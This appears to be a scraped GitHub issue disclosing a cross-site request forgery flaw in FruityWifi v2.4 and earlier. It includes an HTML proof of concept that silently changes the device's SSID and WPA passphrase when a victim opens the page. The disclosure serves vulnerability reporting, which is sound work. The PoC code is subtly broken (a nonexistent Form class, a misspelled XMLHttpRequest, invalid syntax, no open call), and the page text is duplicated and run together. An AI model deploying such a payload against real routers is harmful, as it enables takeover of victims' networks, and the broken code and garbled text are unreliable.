During the analysis of the product, it was observed that FruityWifi <=v2.4 is vulnerable to Cross-Site Request Forgery (CSRF) due to lack of CSRF protection in the page_config_adv.php endpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change of newSSID and hostapd_wpa_passphrase value as per the attacker's choice.
Steps to Reproduce
Generate an HTML Proof of Concept with the below content.
<html>
<head>
<script>
let url = "http://fruitywifi_ip:port/page_config_adv.php";
let form = new Form();
form.append("hostapd","0");
form.append("newSSID","hack");
form.append("hostapd_wpa_passphrase","hack");
let xhr = new XMlHttpRequest();
let xhr.WithCredentials = true;
xhr.send(form);
</script>
</head>
<body>
<h1>Hi Man</h1>
</body>
</html>
Once the victim will open this HTML file, a CSRF request will be triggered to the legitimate server allowing the change of newSSIF and hostapd_wpa_passphrase.
The text was updated successfully, but these errors were encountered:
Vulnerability Description
During the analysis of the product, it was observed that FruityWifi <=v2.4 is vulnerable to Cross-Site Request Forgery (CSRF) due to lack of CSRF protection in the
page_config_adv.phpendpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change ofnewSSIDandhostapd_wpa_passphrasevalue as per the attacker's choice.Steps to Reproduce
newSSIFandhostapd_wpa_passphrase.The text was updated successfully, but these errors were encountered: